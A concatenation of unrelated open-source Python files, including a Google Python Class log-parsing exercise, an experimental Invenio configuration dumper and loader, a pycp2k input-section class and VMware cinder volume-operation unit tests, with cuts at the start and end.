if X.shape[0] != Y.shape[0]:
raise ValueError('X and Y have different number of features')
val = pairwise_continuous_ordinal_kernel(X[self._numeric_columns], Y[self._numeric_columns],
self._numeric_ranges)
if len(self._nominal_columns) > 0:
val += pairwise_nominal_kernel(X[self._nominal_columns].astype(numpy.int8),
Y[self._nominal_columns].astype(numpy.int8))
val /= X.shape[0]
return val
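# --- Illustrative usage sketch (not part of the original module) ---
# Assumptions: the toy DataFrame below is made up for demonstration; only
# clinical_kernel (and, for the estimator-style interface, the
# ClinicalKernelTransform class above) comes from this module.
if __name__ == '__main__':
    toy = pandas.DataFrame({
        'age': [55.0, 61.0, 47.0],                           # continuous
        'stage': pandas.Categorical(['I', 'II', 'II'],
                                    categories=['I', 'II', 'III'],
                                    ordered=True),           # ordinal
        'smoker': pandas.Categorical(['yes', 'no', 'no']),   # nominal
    })
    # 3x3 kernel matrix with values normalized to lie within [0, 1].
    print(clinical_kernel(toy))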
| tum-camp/survival-support-vector-machine | survival/kernels/clinical.py | Python | gpl-3.0 | 10,110 |
#!/usr/bin/python
# Copyright 2010 Google Inc.
# Licensed under the Apache License, Version 2.0
# http://www.apache.org/licenses/LICENSE-2.0
# Google's Python Class
# http://code.google.com/edu/languages/google-python-class/
import os
import re
import sys
import urllib2
"""Logpuzzle exercise
Given an apache logfile, find the puzzle urls and download the images.
Here's what a puzzle url looks like:
10.254.254.28 - - [06/Aug/2007:00:13:48 -0700] "GET /~foo/puzzle-bar-aaab.jpg HTTP/1.0" 302 528 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6"
"""
def read_urls(filename):
"""Returns a list of the puzzle urls from the given log file,
extracting the hostname from the filename itself.
Screens out duplicate urls and returns the urls sorted into
increasing order."""
def extract_key(url):
return re.search(r".*-([a-zA-Z]+\.jpg)", url).group(1)
def create_url(matchObj):
path, resource = matchObj.group(1, 2)
return path + resource
result = []
with open(filename) as f:
logs = f.read().split("\n")
for log in logs:
match = re.search(r"GET (.*/[^/]+/)([\w-]+\.jpg)", log)
if match:
url = create_url(match)
if url not in result:
result.append(url)
result.sort(key=extract_key)
return result
def download_images(img_urls, dest_dir):
"""Given the urls already in the correct order, downloads
each image into the given directory.
Gives the images local filenames img0, img1, and so on.
Creates an index.html in the directory
with an img tag to show each local image file.
Creates the directory if necessary.
"""
    count = 0
    if not os.path.exists(dest_dir):
        os.makedirs(dest_dir)
    os.chdir(dest_dir)
    for url in img_urls:
        image_binary = urllib2.urlopen(url).read()
        with open("img%02d.jpg" % count, "wb") as img:
            img.write(image_binary)
        count += 1
    with open("index.html", "w") as index:
        index.write("<!DOCTYPE html>\n<html>\n\t<head>\n\t\t<title>Puzzle Images</title>\n\t</head>\n\t<body>\n\t\t<h1>Puzzle Images</h1>\n")
        for i in range(count):
            index.write('\t\t<img src="img%02d.jpg">\n' % i)
        index.write("\t</body>\n</html>\n")
def main():
args = sys.argv[1:]
if not args:
print 'usage: [--todir dir] logfile '
sys.exit(1)
todir = ''
if args[0] == '--todir':
todir = args[1]
del args[0:2]
img_urls = read_urls(args[0])
if todir:
download_images(img_urls, todir)
else:
print '\n'.join(img_urls)
if __name__ == '__main__':
main()
| brebory/google-python-exercises | logpuzzle/logpuzzle.py | Python | apache-2.0 | 2,488 |
# -*- coding: utf-8 -*-
##
## This file is part of Invenio.
## Copyright (C) 2010, 2011 CERN.
##
## Invenio is free software; you can redistribute it and/or
## modify it under the terms of the GNU General Public License as
## published by the Free Software Foundation; either version 2 of the
## License, or (at your option) any later version.
##
## Invenio is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
## General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with Invenio; if not, write to the Free Software Foundation, Inc.,
## 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
"""
*** HIGHLY EXPERIMENTAL; PLEASE DO NOT USE. ***
Invenio configuration dumper and loader CLI tool.
Usage: python inveniocfg_dumperloader.py [options]
General options:
-h, --help print this help
-V, --version print version number
Dumper options:
-d file dump the collections into a INI file
-col COLLECTION1,COLLECTION2... collection/s to dump
-all dump all the collections
--force-ids also dump the ids of the tables to the file
 --output print the dump to the screen instead of writing the file
Loader options:
 -l file load a file into the database
 -mode i|c|r select the load mode (insert, correct, replace)
"""
__revision__ = "$Id$"
import sys
import random
import re
import datetime
import StringIO
from string import Template
from invenio.dbquery import run_sql, wash_table_column_name
from configobj import ConfigObj
IDENT_TYPE = " "  # Indentation in the *.INI file can be a tab/spaces/etc...
MESSAGES = [] #List of messages to display to the user at the end of the execution
LOAD_DEFAULT_MODE = 'i'
SEPARATOR = '.'
#Dict of blacklisted fields and the message to display
BLACKLIST_TABLE_COLUMNS = {
'collection.reclist': '#INFO Please rerun webcoll.',
'accROLE.firefole_def_ser': '#INFO Please rerun webaccessadmin -c.',
'score':'#INFO Run whatever relevant',
'tag.value':'#INFO Please run inveniocfg --do-something',
'field_tag.score':'#INFO please run inveniocfg --fill-scores'
}
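# Each collection below maps table names to a dump rule: 'normal' dumps the
# rows as-is, an "a.col = b.col, ..." template describes the join columns of a
# relation table, and an 'extend(...)' template pulls in a translation-style
# side table (e.g. fieldname).  The 'relations' string lists the
# origin-relation-final tables in the order dump_collection walks them.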
COLLECTIONS = {
'FIELD' : {
'tables':{
'field':'extend(field.id=fieldname.id_field,fieldname.$ln.$type = $value)',
'field_tag':'field_tag.id_field = field.id, field_tag.id_tag = tag.id',
'tag':'normal'},
'relations':'field-field_tag-tag',
},
'COLLECTION' : {
'tables':{
'collection':'normal',
'collection_example':'collection_example.id_example = example.id, collection_example.id_collection = collection.id',
'example':'normal'},
'relations':'collection-collection_example-example',
},
'PORTALBOX' : {
'tables':{
'collection':'normal',
'collection_portalbox':'collection_portalbox.id_portalbox = portalbox.id, collection_portalbox.id_collection = collection.id',
'portalbox':'normal',
},
'relations':'collection-collection_portalbox-portalbox',
},
}
def print_usage():
"""Print help."""
print __doc__
def create_section_id(num, with_date=True):
"""
Generate a unique section id.
    Convert the given number to base 18 and append a 4-character random string.
    If with_date=True, prepend the date so the ids can be ordered.
    Structure:
    if with_date:
        date . base18(id) . 4 random chars e.g. tag.2010-07-30.ddcbz2lf
    else:
        base18(id) . 4 random chars e.g. field.ddcbz2lf
"""
digits = "abcdefghijklmnopqrstuvwxyz0123456789"
str_id = ""
tail = ''.join([random.choice(digits) for x in range(4)])
while 1:
rest = num % 18
str_id = digits[rest] + str_id
num = num / 18
if num == 0:
break
if with_date == True:
date = str(datetime.date.today())
return date + "." + str_id + tail
return str_id + tail
def dict2db(table_name, dict_data, mode):
"""
Load the dict values into the database
Three modes of operation:
i - insert
r - replace
c - correct
"""
#Escape all the content in dict data to avoid " and '
for data in dict_data:
dict_data[data] = re.escape(dict_data[data])
if mode == 'i': #Insert mode
query_fields = " , " .join(dict_data.keys())
query_values = "' , '" .join(dict_data.values())
query = "INSERT IGNORE INTO %s(%s) VALUES ('%s')" % (wash_table_column_name(table_name),
query_fields,
query_values)
elif mode == 'c': #Correct mode
if '_' in table_name:
query = "SELECT * FROM %s" % table_name#FIXIT Trick to execute something instead of giving error
else:
tbl_id = get_primary_keys(table_name)[0]
del dict_data[tbl_id]
query_update = " , " .join(["%s=\'%s\'" % (field, dict_data[field]) for field in dict_data])
query = "UPDATE %s SET %s" % (wash_table_column_name(table_name),
query_update)
    else: #Try in the default mode
        dict2db(table_name, dict_data, LOAD_DEFAULT_MODE)
        return
    try:
        run_sql(query)
    except Exception:
        print "QUERY FAILED ON TABLE %s (values may already exist). SKIPPING: %s" % (table_name, query)
def query2list(query, table_name):
"""Given a SQL query return a list of dictionaries with the results"""
results = run_sql(query, with_desc=True)
lst_results = []
dict_results = {}
for section_id, result in enumerate(results[0]):
dict_results = {}
for index, field in enumerate(results[1]):
if not is_blacklisted(table_name, field[0]):
dict_results[field[0]] = result[index]
lst_results.append(dict_results)
return lst_results
def get_primary_keys(table_name):
"""
Get the primary keys from the table with the DESC mysql function
"""
lst_keys = []
query = "DESC %s" % wash_table_column_name(table_name)
results = run_sql(query)
for field in results:
if field[3] == 'PRI':
lst_keys.append(field[0])
return lst_keys
def get_unused_primary_key(table_name):
"""
Returns the first free id from a table
"""
table_id = get_primary_keys(table_name)[0]#FIXIT the table can have more than an id
query = "SELECT %s FROM %s" % (table_id, table_name)
results = query2list(query, table_name)
list_used_ids = [result[table_id] for result in results]
for unused_id in range(1, len(list_used_ids)+2):
if not unused_id in list_used_ids:
return str(unused_id)
def is_blacklisted(table, field):
"""
Check if the current field is blacklisted, if so add the message to the messages list
"""
if (table+ "." + field) in BLACKLIST_TABLE_COLUMNS.keys():
msg = BLACKLIST_TABLE_COLUMNS[(table + "." + field)]
if not msg in MESSAGES:
MESSAGES.append(msg)
return True
return False
def get_relationship(collection, table, field_id):
"""Return the name of the related field"""
tbl_field = table + "." + field_id
dict_relationship = {}
for tbl in collection['tables'].values():
if tbl_field in tbl:
for foo in tbl.split(","):
dict_value, dict_key = foo.split("=")
dict_relationship[dict_key.strip()] = dict_value
return dict_relationship
def delete_keys_from_dict(dict_del, lst_keys):
"""
Delete the keys present in the lst_keys from the dictionary.
Loops recursively over nested dictionaries.
"""
for k in lst_keys:
try:
del dict_del[k]
except KeyError:
pass
for v in dict_del.values():
if isinstance(v, dict):
delete_keys_from_dict(v, lst_keys)
return dict_del
def extract_from_template(template, str_data):
"""
Extract the values from a string given the template
If the template and the string are different, this function may fail
Return a dictionary with the keys from the template and the values from the string
"""
#FIXIT this code can be more elegant
lst_str_data = []
dict_result = {}
pattern = re.compile("\$\w*")
patt_match = pattern.findall(template)
lst_foo = str_data.split("=")
for data in lst_foo:
lst_str_data.extend(data.split("."))
for index, data in enumerate(patt_match):
data = data.replace('$','')
dict_result[data] = lst_str_data[index+1].strip()
return dict_result
def delete_ids(dict_fields, lst_tables):
"""
Remove the ids of the tables from the dictionary
"""
lst_primary = []
for tbl in lst_tables:
lst_primary.extend(get_primary_keys(tbl))
return delete_keys_from_dict(dict_fields, lst_primary)
def add_special_field(collection, tbl_name , dict_data):
"""Add the value for the translation to the dictionary"""
str_template = collection['tables'][tbl_name].split(",")[1][:-1]#FIXIT if the final character is other?
template_key, template_value = str_template.split("=")
template_key = Template(template_key.strip())
template_value = Template(template_value.strip())
id_field = dict_data['id']
query = "SELECT * FROM %s WHERE %s=%s" % ("fieldname", "id_field", id_field)
result = query2list(query, "fieldname")
if result:
for res in result:
dict_data[template_key.safe_substitute(res)] = template_value.safe_substitute(res)
def dump_collection(collection, config, force_ids, print_to_screen=False):
"""
Dump the current collection
    Note: there is a special notation: ori(origin) - rel(relation) - fin(final)
For example in the relation field-field_tag-tag:
ori(origin): field table
rel(relation): field_tag
fin(final): tag
"""
tbl_ori, tbl_rel, tbl_fin = collection['relations'].split("-")
query = "SELECT * FROM %s" % (wash_table_column_name(tbl_ori))
lst_ori = query2list(query, tbl_ori)
tbl_ori_id = get_primary_keys(tbl_ori)[0]
for index_ori, result_ori in enumerate(lst_ori):
dict_rels = get_relationship(collection, tbl_ori, tbl_ori_id)
query = "SELECT * FROM %s WHERE %s=%s" % (wash_table_column_name(tbl_rel),
dict_rels[tbl_ori+"."+tbl_ori_id],
result_ori[tbl_ori_id])
if collection['tables'][tbl_ori].startswith('extend'):
add_special_field(collection, tbl_ori, result_ori)
lst_rel = query2list(query, tbl_rel)
for result_rel in lst_rel:
tbl_fin_id = get_primary_keys(tbl_fin)[0]
tbl_rel_id = dict_rels[tbl_fin+"."+tbl_fin_id].split(".")[1].strip()
query = "SELECT * FROM %s WHERE %s=%s" % (wash_table_column_name(tbl_fin),
tbl_fin_id, result_rel[tbl_rel_id])
lst_fin = query2list(query, tbl_fin)
for index_fin, result_fin in enumerate(lst_fin):
result_ori[tbl_fin+"."+create_section_id(index_fin, with_date=False)] = result_fin
section_name = tbl_ori + "." + create_section_id(index_ori)
if force_ids == False:#Remove the ids from the dict
results = delete_ids(result_ori, collection['relations'].split("-"))
config[section_name] = results
else:
config[section_name] = result_ori
if print_to_screen == True:
output = StringIO.StringIO()
config.write(output)#Write to the output string instead of the file
print output.getvalue()
else:
config.write()
def get_collection(table_name):
"""Get the collection asociated with the section"""
for collection in COLLECTIONS.items():
if table_name in collection[1]['relations'].split("-")[0]:
return COLLECTIONS[collection[0]]#this is the collection to load
def load_section(section_name, dict_data, mode):
"""
Load the section back into the database
table_name is the name of the main section
    There is some special notation: ori(origin) - rel(related) - fin(final) - ext(extended)
For example for the field-tag collection:
ori: field
ext: fieldname
rel: field_tag
fin:tag
"""
table_ori = section_name.split(".")[0]
collection = get_collection(table_ori)
ori_definition = collection['tables'][table_ori]
if ori_definition.startswith("extend"):
tbl_ext_name = ori_definition.split(",")[1].split(SEPARATOR)[0]
lst_tables = collection['relations'].split("-")
ori_id = get_primary_keys(lst_tables[0])[0]
ori_id_value = get_unused_primary_key(lst_tables[0])
dict_data[ori_id] = ori_id_value#Add the calculated id to the dictionary
#I will separate the dict_data into these 3 dicts corresponding to 3 different tables
dict_ori = {}
dict_rel = {}
dict_ext = {}
for field in dict_data:
if type(dict_data[field]) == str:#the field is a string
if "tbl_ext_name" in locals() and field.startswith(tbl_ext_name):#is extended table
dict2db("fieldname",
extract_from_template("fieldname.$ln.$type = $value",
str(field) + " = " + str(dict_data[field])),
mode)
else:
dict_ori[field] = dict_data[field]
else:#if the field is a dictionary
fin_id = get_primary_keys(lst_tables[2])[0]
fin_id_value = get_unused_primary_key(lst_tables[2])
dict_data[field][fin_id] = fin_id_value
dict2db(lst_tables[2], dict_data[field], mode)#Insert the final into the DB
fieldtag_ids = get_primary_keys(lst_tables[1])
dict_rel[fieldtag_ids[0]] = ori_id_value
dict_rel[fieldtag_ids[1]] = fin_id_value
dict2db(lst_tables[1], dict_rel, mode)#Insert the relation into the DB
dict2db(lst_tables[0], dict_ori, mode)
def cli_cmd_dump_config():
"""Dump the selected collection/s"""
config = ConfigObj(indent_type=IDENT_TYPE)
config.initial_comment = [
str(datetime.datetime.now()),
"This file is automatically generated by Invenio, running:",
" ".join(sys.argv) ,
"" ]
force_ids = False
if "--force-ids" in sys.argv:
force_ids = True
print_to_screen = False
if '--output' in sys.argv:
print_to_screen = True
try:
config.filename = sys.argv[sys.argv.index('-d') + 1]
except:
print_usage()
if '-col' in sys.argv:
try:
collection = COLLECTIONS[sys.argv[sys.argv.index('-col') + 1].upper()]
dump_collection(collection, config, force_ids, print_to_screen)
except:
print "ERROR: you must especify the collection to dump with the -col COLLECTION_NAME option"
elif '-all' in sys.argv:
for collection in COLLECTIONS:
dump_collection(COLLECTIONS[collection], config, force_ids, print_to_screen)
else:
print "Please specify the collection to dump"
def cli_cmd_load_config():
"""Load all the config sections back into the database"""
config = ConfigObj(sys.argv[sys.argv.index('-l') + 1])
mode = "r"
if '-mode' in sys.argv:
try:
mode = sys.argv[sys.argv.index('-mode') + 1]
if mode not in ['i', 'c', 'r']:
print "Not valid mode please select one of the following (i)nsert, (c)orrect or (r)eplace"
sys.exit(1)
except IndexError:
print "You must especify the mode with the -mode option"
sys.exit(1)
for section in config.sections:
load_section(section, config[section], mode)
def main():
"""
Main section, makes the calls to all the functions
"""
if "-d" in sys.argv:
cli_cmd_dump_config()
elif "-l" in sys.argv:
cli_cmd_load_config()
elif "-h" in sys.argv:
print_usage()
else:
print_usage()
for message in MESSAGES:
print message
if __name__ == '__main__':
main()
| Panos512/invenio | modules/miscutil/lib/inveniocfg_dumperloader.py | Python | gpl-2.0 | 16,700 |
from awscfncli2.runner import Boto3Profile
class TestStackSelector(object):
def test_update(self):
        s1 = Boto3Profile('foo', 'bar')
s2 = Boto3Profile('foo', 'baz')
assert s1.region_name == 'bar'
s1.update(s2)
| Kotaimen/awscfncli | tests/unit/runner/test_bobo3_profile.py | Python | mit | 246 |
from pycp2k.inputsection import InputSection
class _each397(InputSection):
def __init__(self):
InputSection.__init__(self)
self.Just_energy = None
self.Powell_opt = None
self.Qs_scf = None
self.Xas_scf = None
self.Md = None
self.Pint = None
self.Metadynamics = None
self.Geo_opt = None
self.Rot_opt = None
self.Cell_opt = None
self.Band = None
self.Ep_lin_solver = None
self.Spline_find_coeffs = None
self.Replica_eval = None
self.Bsse = None
self.Shell_opt = None
self.Tddft_scf = None
self._name = "EACH"
self._keywords = {'Bsse': 'BSSE', 'Cell_opt': 'CELL_OPT', 'Just_energy': 'JUST_ENERGY', 'Band': 'BAND', 'Xas_scf': 'XAS_SCF', 'Rot_opt': 'ROT_OPT', 'Replica_eval': 'REPLICA_EVAL', 'Tddft_scf': 'TDDFT_SCF', 'Shell_opt': 'SHELL_OPT', 'Md': 'MD', 'Pint': 'PINT', 'Metadynamics': 'METADYNAMICS', 'Geo_opt': 'GEO_OPT', 'Spline_find_coeffs': 'SPLINE_FIND_COEFFS', 'Powell_opt': 'POWELL_OPT', 'Qs_scf': 'QS_SCF', 'Ep_lin_solver': 'EP_LIN_SOLVER'}
| SINGROUP/pycp2k | pycp2k/classes/_each397.py | Python | lgpl-3.0 | 1,114 |
# Copyright (c) 2014 VMware, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Test suite for VMware VMDK driver volumeops module.
"""
import mock
from oslo_utils import units
from oslo_vmware import exceptions
from oslo_vmware import vim_util
from cinder import test
from cinder.volume.drivers.vmware import exceptions as vmdk_exceptions
from cinder.volume.drivers.vmware import volumeops
class VolumeOpsTestCase(test.TestCase):
"""Unit tests for volumeops module."""
MAX_OBJECTS = 100
def setUp(self):
super(VolumeOpsTestCase, self).setUp()
self.session = mock.MagicMock()
self.vops = volumeops.VMwareVolumeOps(self.session, self.MAX_OBJECTS)
def test_split_datastore_path(self):
test1 = '[datastore1] myfolder/mysubfolder/myvm.vmx'
(datastore, folder, file_name) = volumeops.split_datastore_path(test1)
self.assertEqual(datastore, 'datastore1')
self.assertEqual(folder, 'myfolder/mysubfolder/')
self.assertEqual(file_name, 'myvm.vmx')
test2 = '[datastore2 ] myfolder/myvm.vmdk'
(datastore, folder, file_name) = volumeops.split_datastore_path(test2)
self.assertEqual(datastore, 'datastore2')
self.assertEqual(folder, 'myfolder/')
self.assertEqual(file_name, 'myvm.vmdk')
test3 = 'myfolder/myvm.vmdk'
self.assertRaises(IndexError, volumeops.split_datastore_path, test3)
def vm(self, val):
"""Create a mock vm in retrieve result format."""
vm = mock.MagicMock()
prop = mock.Mock(spec=object)
prop.val = val
vm.propSet = [prop]
return vm
def test_get_backing(self):
name = 'mock-backing'
# Test no result
self.session.invoke_api.return_value = None
result = self.vops.get_backing(name)
self.assertIsNone(result)
self.session.invoke_api.assert_called_once_with(vim_util,
'get_objects',
self.session.vim,
'VirtualMachine',
self.MAX_OBJECTS)
# Test single result
vm = self.vm(name)
vm.obj = mock.sentinel.vm_obj
retrieve_result = mock.Mock(spec=object)
retrieve_result.objects = [vm]
self.session.invoke_api.return_value = retrieve_result
self.vops.cancel_retrieval = mock.Mock(spec=object)
result = self.vops.get_backing(name)
self.assertEqual(mock.sentinel.vm_obj, result)
self.session.invoke_api.assert_called_with(vim_util, 'get_objects',
self.session.vim,
'VirtualMachine',
self.MAX_OBJECTS)
self.vops.cancel_retrieval.assert_called_once_with(retrieve_result)
# Test multiple results
retrieve_result2 = mock.Mock(spec=object)
retrieve_result2.objects = [vm('1'), vm('2'), vm('3')]
self.session.invoke_api.return_value = retrieve_result2
self.vops.continue_retrieval = mock.Mock(spec=object)
self.vops.continue_retrieval.return_value = retrieve_result
result = self.vops.get_backing(name)
self.assertEqual(mock.sentinel.vm_obj, result)
self.session.invoke_api.assert_called_with(vim_util, 'get_objects',
self.session.vim,
'VirtualMachine',
self.MAX_OBJECTS)
self.vops.continue_retrieval.assert_called_once_with(retrieve_result2)
self.vops.cancel_retrieval.assert_called_with(retrieve_result)
def test_delete_backing(self):
backing = mock.sentinel.backing
task = mock.sentinel.task
self.session.invoke_api.return_value = task
self.vops.delete_backing(backing)
self.session.invoke_api.assert_called_once_with(self.session.vim,
"Destroy_Task",
backing)
self.session.wait_for_task(task)
def test_get_host(self):
instance = mock.sentinel.instance
host = mock.sentinel.host
self.session.invoke_api.return_value = host
result = self.vops.get_host(instance)
self.assertEqual(host, result)
self.session.invoke_api.assert_called_once_with(vim_util,
'get_object_property',
self.session.vim,
instance,
'runtime.host')
def test_get_hosts(self):
hosts = mock.sentinel.hosts
self.session.invoke_api.return_value = hosts
result = self.vops.get_hosts()
self.assertEqual(hosts, result)
self.session.invoke_api.assert_called_once_with(vim_util,
'get_objects',
self.session.vim,
'HostSystem',
self.MAX_OBJECTS)
def test_continue_retrieval(self):
retrieve_result = mock.sentinel.retrieve_result
self.session.invoke_api.return_value = retrieve_result
result = self.vops.continue_retrieval(retrieve_result)
self.assertEqual(retrieve_result, result)
self.session.invoke_api.assert_called_once_with(vim_util,
'continue_retrieval',
self.session.vim,
retrieve_result)
def test_cancel_retrieval(self):
retrieve_result = mock.sentinel.retrieve_result
self.session.invoke_api.return_value = retrieve_result
result = self.vops.cancel_retrieval(retrieve_result)
self.assertIsNone(result)
self.session.invoke_api.assert_called_once_with(vim_util,
'cancel_retrieval',
self.session.vim,
retrieve_result)
def test_is_usable(self):
mount_info = mock.Mock(spec=object)
mount_info.accessMode = "readWrite"
mount_info.mounted = True
mount_info.accessible = True
self.assertTrue(self.vops._is_usable(mount_info))
del mount_info.mounted
self.assertTrue(self.vops._is_usable(mount_info))
mount_info.accessMode = "readonly"
self.assertFalse(self.vops._is_usable(mount_info))
mount_info.accessMode = "readWrite"
mount_info.mounted = False
self.assertFalse(self.vops._is_usable(mount_info))
mount_info.mounted = True
mount_info.accessible = False
self.assertFalse(self.vops._is_usable(mount_info))
del mount_info.accessible
self.assertFalse(self.vops._is_usable(mount_info))
def _create_host_mounts(self, access_mode, host, set_accessible=True,
is_accessible=True, mounted=True):
"""Create host mount value of datastore with single mount info.
:param access_mode: string specifying the read/write permission
:param set_accessible: specify whether accessible property
should be set
:param is_accessible: boolean specifying whether the datastore
is accessible to host
:param host: managed object reference of the connected
host
:return: list of host mount info
"""
mntInfo = mock.Mock(spec=object)
mntInfo.accessMode = access_mode
if set_accessible:
mntInfo.accessible = is_accessible
else:
del mntInfo.accessible
mntInfo.mounted = mounted
host_mount = mock.Mock(spec=object)
host_mount.key = host
host_mount.mountInfo = mntInfo
host_mounts = mock.Mock(spec=object)
host_mounts.DatastoreHostMount = [host_mount]
return host_mounts
def test_get_connected_hosts(self):
with mock.patch.object(self.vops, 'get_summary') as get_summary:
datastore = mock.sentinel.datastore
summary = mock.Mock(spec=object)
get_summary.return_value = summary
summary.accessible = False
hosts = self.vops.get_connected_hosts(datastore)
self.assertEqual([], hosts)
summary.accessible = True
host = mock.Mock(spec=object)
host.value = mock.sentinel.host
host_mounts = self._create_host_mounts("readWrite", host)
self.session.invoke_api.return_value = host_mounts
hosts = self.vops.get_connected_hosts(datastore)
self.assertEqual([mock.sentinel.host], hosts)
self.session.invoke_api.assert_called_once_with(
vim_util,
'get_object_property',
self.session.vim,
datastore,
'host')
del host_mounts.DatastoreHostMount
hosts = self.vops.get_connected_hosts(datastore)
self.assertEqual([], hosts)
@mock.patch('cinder.volume.drivers.vmware.volumeops.VMwareVolumeOps.'
'get_connected_hosts')
def test_is_datastore_accessible(self, get_connected_hosts):
host_1 = mock.sentinel.host_1
host_2 = mock.sentinel.host_2
get_connected_hosts.return_value = [host_1, host_2]
ds = mock.sentinel.datastore
host = mock.Mock(value=mock.sentinel.host_1)
self.assertTrue(self.vops.is_datastore_accessible(ds, host))
get_connected_hosts.assert_called_once_with(ds)
@mock.patch('cinder.volume.drivers.vmware.volumeops.VMwareVolumeOps.'
'get_connected_hosts')
def test_is_datastore_accessible_with_inaccessible(self,
get_connected_hosts):
host_1 = mock.sentinel.host_1
get_connected_hosts.return_value = [host_1]
ds = mock.sentinel.datastore
host = mock.Mock(value=mock.sentinel.host_2)
self.assertFalse(self.vops.is_datastore_accessible(ds, host))
get_connected_hosts.assert_called_once_with(ds)
def test_is_valid(self):
with mock.patch.object(self.vops, 'get_summary') as get_summary:
summary = mock.Mock(spec=object)
get_summary.return_value = summary
datastore = mock.sentinel.datastore
host = mock.Mock(spec=object)
host.value = mock.sentinel.host
def _is_valid(host_mounts, is_valid):
self.session.invoke_api.return_value = host_mounts
result = self.vops._is_valid(datastore, host)
self.assertEqual(is_valid, result)
self.session.invoke_api.assert_called_with(
vim_util,
'get_object_property',
self.session.vim,
datastore,
'host')
# Test positive cases
summary.maintenanceMode = 'normal'
summary.accessible = True
_is_valid(self._create_host_mounts("readWrite", host), True)
# Test negative cases
_is_valid(self._create_host_mounts("Inaccessible", host), False)
_is_valid(self._create_host_mounts("readWrite", host, True, False),
False)
_is_valid(self._create_host_mounts("readWrite", host, True, True,
False), False)
summary.accessible = False
_is_valid(self._create_host_mounts("readWrite", host, False),
False)
summary.accessible = True
summary.maintenanceMode = 'inMaintenance'
_is_valid(self._create_host_mounts("readWrite", host), False)
def test_get_dss_rp(self):
with mock.patch.object(self.vops, 'get_summary') as get_summary:
summary = mock.Mock(spec=object)
summary.accessible = True
            summary.maintenanceMode = 'normal'
get_summary.return_value = summary
# build out props to be returned by 1st invoke_api call
datastore_prop = mock.Mock(spec=object)
datastore_prop.name = 'datastore'
datastore_prop.val = mock.Mock(spec=object)
datastore_prop.val.ManagedObjectReference = [mock.sentinel.ds1,
mock.sentinel.ds2]
compute_resource_prop = mock.Mock(spec=object)
compute_resource_prop.name = 'parent'
compute_resource_prop.val = mock.sentinel.compute_resource
elem = mock.Mock(spec=object)
elem.propSet = [datastore_prop, compute_resource_prop]
props = [elem]
# build out host_mounts to be returned by 2nd invoke_api call
host = mock.Mock(spec=object)
host.value = mock.sentinel.host
host_mounts = self._create_host_mounts("readWrite", host)
# build out resource_pool to be returned by 3rd invoke_api call
resource_pool = mock.sentinel.resource_pool
# set return values for each call of invoke_api
self.session.invoke_api.side_effect = [props,
host_mounts,
host_mounts,
resource_pool]
# invoke function and verify results
(dss_actual, rp_actual) = self.vops.get_dss_rp(host)
self.assertEqual([mock.sentinel.ds1, mock.sentinel.ds2],
dss_actual)
self.assertEqual(resource_pool, rp_actual)
# invoke function with no valid datastore
summary.maintenanceMode = 'inMaintenance'
self.session.invoke_api.side_effect = [props,
host_mounts,
host_mounts,
resource_pool]
self.assertRaises(exceptions.VimException,
self.vops.get_dss_rp,
host)
# Clear side effects.
self.session.invoke_api.side_effect = None
def test_get_parent(self):
# Not recursive
child = mock.Mock(spec=object)
child._type = 'Parent'
ret = self.vops._get_parent(child, 'Parent')
self.assertEqual(ret, child)
# Recursive
parent = mock.Mock(spec=object)
parent._type = 'Parent'
child = mock.Mock(spec=object)
child._type = 'Child'
self.session.invoke_api.return_value = parent
ret = self.vops._get_parent(child, 'Parent')
self.assertEqual(ret, parent)
self.session.invoke_api.assert_called_with(vim_util,
'get_object_property',
self.session.vim, child,
'parent')
def test_get_dc(self):
# set up hierarchy of objects
dc = mock.Mock(spec=object)
dc._type = 'Datacenter'
o1 = mock.Mock(spec=object)
o1._type = 'mockType1'
o1.parent = dc
o2 = mock.Mock(spec=object)
o2._type = 'mockType2'
o2.parent = o1
# mock out invoke_api behaviour to fetch parent
def mock_invoke_api(vim_util, method, vim, the_object, arg):
return the_object.parent
self.session.invoke_api.side_effect = mock_invoke_api
ret = self.vops.get_dc(o2)
self.assertEqual(dc, ret)
# Clear side effects.
self.session.invoke_api.side_effect = None
def test_get_vmfolder(self):
self.session.invoke_api.return_value = mock.sentinel.ret
ret = self.vops.get_vmfolder(mock.sentinel.dc)
self.assertEqual(mock.sentinel.ret, ret)
self.session.invoke_api.assert_called_once_with(vim_util,
'get_object_property',
self.session.vim,
mock.sentinel.dc,
'vmFolder')
def test_create_folder_with_empty_vmfolder(self):
"""Test create_folder when the datacenter vmFolder is empty"""
child_folder = mock.sentinel.child_folder
self.session.invoke_api.side_effect = [None, child_folder]
parent_folder = mock.sentinel.parent_folder
child_name = 'child_folder'
ret = self.vops.create_folder(parent_folder, child_name)
self.assertEqual(child_folder, ret)
expected_calls = [mock.call(vim_util, 'get_object_property',
self.session.vim, parent_folder,
'childEntity'),
mock.call(self.session.vim, 'CreateFolder',
parent_folder, name=child_name)]
self.assertEqual(expected_calls,
self.session.invoke_api.call_args_list)
def test_create_folder_not_present(self):
"""Test create_folder when child not present."""
parent_folder = mock.sentinel.parent_folder
child_name = 'child_folder'
prop_val = mock.Mock(spec=object)
prop_val.ManagedObjectReference = []
child_folder = mock.sentinel.child_folder
self.session.invoke_api.side_effect = [prop_val, child_folder]
ret = self.vops.create_folder(parent_folder, child_name)
self.assertEqual(child_folder, ret)
expected_invoke_api = [mock.call(vim_util, 'get_object_property',
self.session.vim, parent_folder,
'childEntity'),
mock.call(self.session.vim, 'CreateFolder',
parent_folder, name=child_name)]
self.assertEqual(expected_invoke_api,
self.session.invoke_api.mock_calls)
# Clear side effects.
self.session.invoke_api.side_effect = None
def test_create_folder_already_present(self):
"""Test create_folder when child already present."""
parent_folder = mock.sentinel.parent_folder
child_name = 'child_folder'
prop_val = mock.Mock(spec=object)
child_entity_1 = mock.Mock(spec=object)
child_entity_1._type = 'Folder'
child_entity_1_name = 'SomeOtherName'
